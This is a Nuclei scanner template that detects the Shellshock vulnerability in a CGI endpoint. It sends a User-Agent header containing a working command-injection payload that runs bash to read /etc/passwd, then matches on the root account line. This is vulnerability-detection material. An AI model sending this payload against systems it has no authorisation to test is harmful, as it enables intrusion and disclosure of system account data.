nuclei-templates/vulnerabilities/other/rce-shellshock-user-agent.yaml

19 lines
401 B
YAML
Raw Normal View History

2020-05-28 15:20:00 +00:00
id: rce-user-agent-shell-shock
info:
name: Remote Code Execution Via (User-Agent)
author: 0xelkomy
severity: high
tags: shellshock,rce
2020-05-28 15:20:00 +00:00
requests:
2021-02-13 04:55:02 +00:00
- method: GET
headers:
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
path:
- "{{BaseURL}}/cgi-bin/status"
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body